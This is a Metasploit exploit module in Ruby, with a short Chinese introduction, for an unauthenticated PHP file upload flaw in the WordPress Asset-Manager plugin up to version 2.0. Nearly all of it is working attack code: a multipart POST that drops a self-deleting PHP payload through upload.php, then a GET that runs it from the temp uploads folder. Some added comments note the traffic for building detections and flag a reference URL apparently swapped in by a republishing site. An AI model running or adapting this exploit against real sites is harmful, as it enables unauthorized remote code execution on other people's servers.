这个模块利用 Metasploit 漏洞库中收录的、在 WordPress Asset-Manager 插件 2.0 及以下版本中发现的漏洞。该漏洞允许上传 PHP 文件：用户无需身份验证即可将文件上传到一个临时目录，从而导致任意代码执行。

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'
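class Metasploit3 < Msf::Exploit::Remote
  # Exploit module for the unauthenticated file upload in the WordPress
  # Asset-Manager plugin (<= 2.0). Network footprint of a run, useful when
  # writing detections: a multipart POST to
  # wp-content/plugins/asset-manager/upload.php carrying a .php file in the
  # "Filedata" form field, followed by a GET for that same file under
  # wp-content/uploads/assets/temp/.
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # PhpEXE provides get_write_exec_payload (used in #exploit). The mixin name
  # was garbled in the pasted copy; it is restored here to match the
  # 'msf/core/exploit/php_exe' require at the top of the file.
  include Msf::Exploit::PhpEXE

  # Module metadata and options. TARGETURI is the WordPress base path; the
  # plugin-specific paths in #exploit are appended to it.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin. By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          # NOTE(review): this URL entry looks like a substitution made by the
          # site that republished the module rather than the original advisory
          # link — confirm against the upstream Metasploit copy.
          [ 'URL', 'http:// www.myhack58.com /' ],
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Uploads the PHP payload through the plugin's upload handler, then requests
  # the uploaded file so the web server executes it. Aborts via fail_with when
  # the upload response does not look like a success.
  def exploit
    uri = target_uri.path
    # Ensures a trailing slash so the plugin paths below can be concatenated.
    # NOTE(review): this mutates the string returned by target_uri.path in
    # place — confirm it is not frozen or shared in this framework version.
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    # Random 5-letter basename; the upload response is expected to echo it back.
    payload_name = "#{rand_text_alpha(5)}.php"
    # Per the option name, :unlink_self asks the generated PHP to remove its own
    # file after it runs, so responders should not expect the temp file to
    # persist on disk; the two HTTP requests in the access log are the durable
    # trace of a run.
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    # Strips the CRLF that Rex::MIME::Message emits before the first boundary.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # Success criterion: an HTTP 200 whose body mentions the uploaded filename.
    # The filename is interpolated into the regex unescaped, so the '.' before
    # "php" acts as a wildcard; an exact substring check (include?) would be
    # the stricter test.
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'    => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method' => 'GET'
    })

    # Only a non-nil response with a non-200 status is treated as failure; a
    # nil response (no reply to the GET) is deliberately not reported as one.
    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end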
|